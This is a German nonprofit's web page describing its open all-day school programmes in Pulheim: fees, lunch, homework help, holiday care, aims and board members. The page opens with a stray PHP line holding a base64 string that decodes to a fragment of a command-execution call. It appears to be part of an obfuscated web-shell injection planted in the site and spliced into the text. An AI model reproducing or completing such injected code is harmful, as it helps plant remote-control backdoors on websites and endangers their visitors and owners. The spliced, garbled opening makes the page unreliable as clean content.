$bu="Y21kJ10pOw=="; $qu =

GiP Konzept

Informationen zur Offenen Ganztagsschule (OGS)

OGS - ein vernetztes schulisches Angebot

  • basiert auf Landeserlass/ gefördert vom Land NRW
  • OGS-Konzeptes im Schulprogramm verankert
  • OGS-Konzeptentwicklung im Rahmen der Schulentwicklung in Zusammenarbeit von Lehrerkollegium und OGS-Team
  • OGS-Qualitätszirkel auf kommunaler Ebene und Landesebene
  • Regelmäßige Teamfortbildungen

Beitrag einkommensgestaffelt, Geschwisterkinder beitragsfrei

  • OGS-Beitrag ist Bestandteil der Beitragssatzung der Stadt Pulheim
  • Beiträge sind einkommensgestaffelt
  • nur ein Kind zahlt, wenn Geschwisterkinder in Kita oder OGS sind

Mittagessen, Hausaufgaben, Förder- und Freizeitangebote

  • warmes Mittagessen für alle OGS-Kinder
  • Klassenlehrer/in und täglich anwesende Gruppenleitung für jedes OGS-Kind
  • Vernetzte Zusammenarbeit von Lehrer/in und Gruppenleitung und abgestimmte Förderung der OGS-Kinder
  • verbindliche Lern- und Hausaufgabenbetreuung mit Lehrereinsatz
  • freizeitpädagogische Angebote
  • verbindliche Teilnahme an 5 Tagen in der Woche bis 15:00 bzw. 16:00 Uhr

Verlässliches Betreuungsangebot in den Schulferien

  • bei Bedarf garantierter Platz in der OGS-Ferienbetreuung in den Sommerferien (3 Wochen), Herbstferien (2 Wochen) und Osterferien (2 Wochen)
  • edarfsgerechtes OGS-Betreuungsangebot an unterrichtsfreien Tagen und beweglichen Ferientagen (z.B. Freitag nach Fronleichnam und Himmelfahrt)
  •  
  •  

GiP ist ein gemeinnütziger Verein und anerkannter Träger der freien Jugendhilfe. Die Mitglieder des Vereins sind Schulen, Elternvereine, Schulverwaltung und Jugendamt sowie Einzelmitglieder wie Lehrer, Eltern, päd. Mitarbeiter und engagierte weitere Personen. Seit Beginn des Schuljahres 2006/2007 kooperiert GiP mit den Pulheimer Grundschulen, seit 2007/2008 auch mit der Förderschule an der Jahnstrasse für den Offenen Ganztag sowie seit 2009/2010 mit den weiterführenden Schulen im gebundenen Ganztag.   

GiP kooperiert mit den Pulheimer Ganztagsschulen für den quantitativen und qualitativen Auf- und Ausbau der Ganztagsschulkonzepte. Dabei steht GiP insbesondere für die Einbindung von sozialpädagogischen Perspektiven und Angeboten sowie für die Einbindung von alltagspädagogischen Inhalten und Sozialraumorientierung bei der Programmgestaltung der Ganztagsschulen. Bei der Planung und Organisation der pädagogischen Arbeit  strebt GiP nach dem Einsatz von kontinuierlichen Fachkräften, verbindlichen Abläufen und nach größtmöglicher Vernetzung der verschiedenen Bezugspersonen (Lehrer, Erzieher, päd. Mitarbeiter, etc.) der Kinder in der Schule. GiP entwickelt seine Peronalkonzepte in Anlehnung an diese Grundsätze. GiP ist Anstellungsträger für das pädagogische Personal für die außerunterrichtlichen Angebote in den Ganztagsschulen. Zusammen mit den Steuerungsgruppen der Schulen entwickelt GiP das Programm für die außerunterrichtlichen Angebote im Ganztag, qualifiziert das Personal  und akquiriert Angebote. Dazu kooperiert GiP mit örtlichen Einrichtungen der kulturellen Bildung, Lernförderung und Vereinen für den Sport im Ganztag.

Für die Ferienangebote in den Schulferien kooperiert GiP mit dem Jugendamt der Stadt Pulheim und mit weiteren Trägern der freien Jugendhilfe. GiP ist danach bestrebt, Ferienangebote zu entwickeln, die sich deutlich vom Schulalltag unterscheiden. Die Ferienteams entwickeln spannende Ferienprogramme mit vielen Spielen und kleineren und größeren Ausflügen. GiP arbeitet mit jugendlichen Teamern zusammen, für die die pädagogische Betreuungsarbeit in den Ferienmaßnahmen ein interessantes Praxisfeld für die berufliche Orientierung bietet. Die Teamer werden im Vorfeld der Ferienmaßnahmen für die Arbeit mit den Kindern geschult und erhalten für ihre Arbeit eine Aufwandsentschädigung.

Ziel von GiP ist die Vernetzung der am Bildungsprozess von Kindern und Jugendlichen beteiligten Partner für das ganztägige Leben und Lernen in der Schule.

GiP bindet sich ein in die Weiterentwicklung der Bildungspartner zu einer vernetzten Pulheimer Bildungslandschaft.

GiP freut sich stets über neue Mitglieder, die bereit sind, bei der Gestaltung der Weiterentwicklung des Ganztages der Pulheimer Schulen als Kooperation von Jugendhilfe und Schule mitzuwirken.Sehr willkommen sind auch Fördermitglieder und Sponsoren, die entweder durch regelmäßige Beiträge oder auch durch einmalige Spenden helfen, qualitativ gute Förderbedingungen für Pulheimer Kinder in den außerunterrichtlichen Angeboten der Pulheimer Ganztagsschulen sicher zu stellen. Spendenquittungen sind möglich. Informationsbroschüren über GiP e. V. und über die Offenen Ganztagsgrundschulen sind in der Geschäftsstelle erhältlich.

 

Vorstand:

  • Birgit auf der Landwehr

Geschäftsführung:

  • Iris Flacke : Personal und fachliche Koordination, Ansprechpartnerin für Grundschulen
    Birgit auf der Landwehr: Finanzen, Controlling, Ansprechpartnerin für weiterführende Schulen

Verwaltungsrat:

  • 1. Vorsitzende:     Maria Rach
  • 2. Vorsitzende/r:   vakant
  • Kassiererin:           Wanda Spielhoff
  • Beisitzer/innen:     Elmar Brix
                              Claudia Dahm
                              Gerhard Maier
                              Bianca Korte

Programmschwerpunkte im Offenen/gebundenen Ganztag:

  • Gruppenarbeit in additiver (vormittags Unterricht, nachmittags außerunterrichtliche Angebote) oder rhythmisierter (Ganztagsklassen) Form
  • ganztägige Lern-, Förder- und Freizeitangebote zusätzlich zum Unterricht
  • warmes Mittagessen
  • Ferienbetreuung

 

Hier können Sie sich unsere Satzung als pdf Dokument anzeigen lassen.

 


GiP e.V. ist Kooperationspartner der
offenen Ganztagsgrundschulen in Pulheim
  Spenden Sie jetzt.